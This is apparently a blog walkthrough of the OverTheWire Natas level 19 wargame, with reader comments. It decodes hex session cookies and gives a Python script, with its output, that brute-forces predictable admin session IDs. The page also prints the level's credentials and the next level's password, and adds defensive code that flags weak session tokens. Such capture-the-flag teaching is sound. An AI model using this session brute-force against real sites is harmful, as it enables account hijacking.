With the credentials discovered in the previous challenge, head over to http://natas19.natas.labs.overthewire.org and take a look at its content.
Since this is a follow-up to the previous challenge, this one will be pretty short: the core is the same as before, and this level is more of a "find the differences" challenge. Let's get to it.
Opening the page shows a login form like before, but this time there is bold text that says: "This page uses mostly the same code as the previous level, but session IDs are no longer sequential...".
I'd advise you to forget this text, as reading it only confused me when watching how the session ID changed.
There's only one thing we can actually do here, which is to log in. A good first thing to try is logging in without any credentials, just sending an empty form. Let's do this several times, deleting the PHPSESSID cookie between attempts; this is how the cookie changed:
```text
PHPSESSID=3632362d
PHPSESSID=3335332d
PHPSESSID=3138372d
PHPSESSID=3534322d
PHPSESSID=37322d
PHPSESSID=3437352d
PHPSESSID=3236372d
PHPSESSID=34352d
```
I hope something stands out: although most of the characters change, the last two are always the same, 0x2D, which is the hex value for '-' in ASCII. The remaining characters are all digits as well (pro-tip: 0x30 = '0', 0x39 = '9'), so what we have is a number (so far up to three digits) followed by a '-' (e.g. 626-, 353-). We can assume this is a hex-encoded string. Now let's try sending a single letter as the username and see how the cookie changes:
```text
PHPSESSID=3439322d61
PHPSESSID=3237352d62
PHPSESSID=3235322d63
PHPSESSID=3139312d6162
PHPSESSID=3337352d616263
```
What's being sent as the username is, in order: a, b, c, ab, abc. Is it clear? After the '-', what we're getting is the username, hex encoded as well (61 = a, 62 = b, 63 = c). It's time to recall the useless function from the previous challenge, isValidAdminLogin. Previously, as we could see in the source code, this function didn't do anything and just returned FALSE; maybe in this challenge it's not commented out, so if the username is admin it may return TRUE and give access? We can try admin as the username, but that by itself won't solve the challenge. What we're missing, just like in the previous level, is the correct session ID, which here is composed of a number (guessing from 1 to 640, like previously) followed by a '-', followed by admin. Something that looks like this: 123-admin, all hex encoded. Now that we know what we need to find, it's time to bring in the script from the previous level, with some minor changes:
```python
# Created by Joao Godinho
# October 2014
# Script to brute force level 19 of natas wargames
# Refer to http://floatingbytes.blogspot.com for details
# Library to work with the POST requests
import requests

# Our target URL
target = 'http://natas19:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs@natas19.natas.labs.overthewire.org/'

# The magic words that tell us we got it
acceptStr = "You are an admin."

# Checking if we can connect to the target, just in case...
r = requests.get(target)
if r.status_code != requests.codes.ok:
    raise ValueError('Kabum? Couldn\'t connect to target :(')
else:
    print 'Target reachable. Starting session brute force...'

# Iterate each session and check if there's one with admin access
for i in range(1,641):
    if i % 10 == 0:
        print 'Checked '+str(i)+' sessions...'
    cookies = dict(PHPSESSID=(str(i)+'-admin').encode('hex'))
    r = requests.get(target, cookies=cookies)
    # Did we find the right session?
    if r.content.find(acceptStr) != -1:
        print 'Got it! Session='+str(i)
        print r.content
        break
print 'Done. Have fun!'
```
The only change is on line 25, where the PHPSESSID cookie is built (the script is Python 2, hence the print statements and str.encode('hex')). Running it produces the following:
```text
Target reachable. Starting session brute force...
Checked 10 sessions...
Checked 20 sessions...
Checked 30 sessions...
Checked 40 sessions...
Checked 50 sessions...
Checked 60 sessions...
Checked 70 sessions...
Checked 80 sessions...
Checked 90 sessions...
Checked 100 sessions...
Checked 110 sessions...
Checked 120 sessions...
Checked 130 sessions...
Checked 140 sessions...
Checked 150 sessions...
Checked 160 sessions...
Checked 170 sessions...
Checked 180 sessions...
Checked 190 sessions...
Checked 200 sessions...
Checked 210 sessions...
Checked 220 sessions...
Checked 230 sessions...
Checked 240 sessions...
Checked 250 sessions...
Checked 260 sessions...
Checked 270 sessions...
Checked 280 sessions...
Checked 290 sessions...
Checked 300 sessions...
Checked 310 sessions...
Checked 320 sessions...
Checked 330 sessions...
Checked 340 sessions...
Checked 350 sessions...
Checked 360 sessions...
Checked 370 sessions...
Checked 380 sessions...
Checked 390 sessions...
Checked 400 sessions...
Checked 410 sessions...
Checked 420 sessions...
Checked 430 sessions...
Checked 440 sessions...
Checked 450 sessions...
Checked 460 sessions...
Checked 470 sessions...
Checked 480 sessions...
Checked 490 sessions...
Checked 500 sessions...
Got it! Session=501
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas19", "pass": "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs" };</script></head>
<body>
<h1>natas19</h1>
<div id="content">
<p>
<b>
This page uses mostly the same code as the previous level, but session IDs are no longer sequential...
</b>
</p>
You are an admin. The credentials for the next level are:<br><pre>Username: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre></div>
</body>
</html>

Done. Have fun!
```
501 tries later we finally hit the right one, and there we go: on line 72 of the output we have the password.
User: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
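To make the weakness concrete, here is an added example (my own code, not from the original post or the wargame): it decodes the cookies observed above into their number and username, rebuilds one the same way the level does, puts a number on the keyspace an attacker faces, and contrasts that with a CSPRNG token of the kind a session handler should hand out. The 640 upper bound is the write-up's own guess, not a value taken from the level.

```python
# Added example (not from the original post): decode the natas19-style
# session cookie, measure its keyspace and compare it with a random token.
import math
import re
import secrets

# Layout observed in the write-up: hex("<number>-<username>"), e.g. "626-", "492-a".
WEAK_PATTERN = re.compile(r"^(\d+)-(.*)$", re.S)
MAX_NUMBER = 640  # assumed range of the numeric part (the write-up's guess)


def decode_session_id(cookie):
    """Return (number, username) if the cookie follows the weak layout, else None."""
    try:
        raw = bytes.fromhex(cookie).decode("ascii")
    except ValueError:  # not valid hex, or not ASCII once decoded
        return None
    m = WEAK_PATTERN.match(raw)
    if not m:
        return None
    return int(m.group(1)), m.group(2)


def encode_session_id(number, username):
    """Build a cookie the same way the level does: hex of 'number-username'."""
    return f"{number}-{username}".encode("ascii").hex()


def weak_keyspace_bits():
    """Once the username is known, only the number is secret: log2(640) ~ 9.3 bits."""
    return math.log2(MAX_NUMBER)


def random_session_id(nbytes=16):
    """What a session ID should be: CSPRNG output with no recoverable structure."""
    return secrets.token_hex(nbytes)


def looks_weak(cookie):
    """Flag a cookie that decodes to the predictable 'number-username' layout."""
    return decode_session_id(cookie) is not None
```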
A little more complex than the previous one, but still pretty accessible. A proper warm-up for what's coming.
Never Settle,
Bro, super liked your writeup. Pretty much the best version of the natas walkthrough, with detailed explanations.

Thanks, glad you liked it :)

Yeah, now I understand why Python is so important for cybersecurity, thanks for your nice writeups!